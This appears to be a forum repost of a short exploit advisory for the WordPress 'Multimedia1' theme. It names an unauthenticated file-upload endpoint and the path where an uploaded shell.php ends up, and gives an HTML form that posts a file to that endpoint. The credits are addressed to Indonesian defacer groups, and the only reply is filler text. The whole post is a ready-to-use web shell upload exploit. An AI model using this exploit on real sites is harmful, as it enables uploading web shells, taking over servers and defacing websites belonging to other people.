90_ 发表于 2017-3-28 09:31:55

Wordpress Multimedia1 Themes CSRF

# [!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

# [!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php

#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# [*] ABOUT:
#################################################################################
# Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
#################################################################################

klt_30 发表于 2017-5-20 17:02:25

1111111111111111111111
页: [1]
查看完整版本: Wordpress Multimedia1 Themes CSRF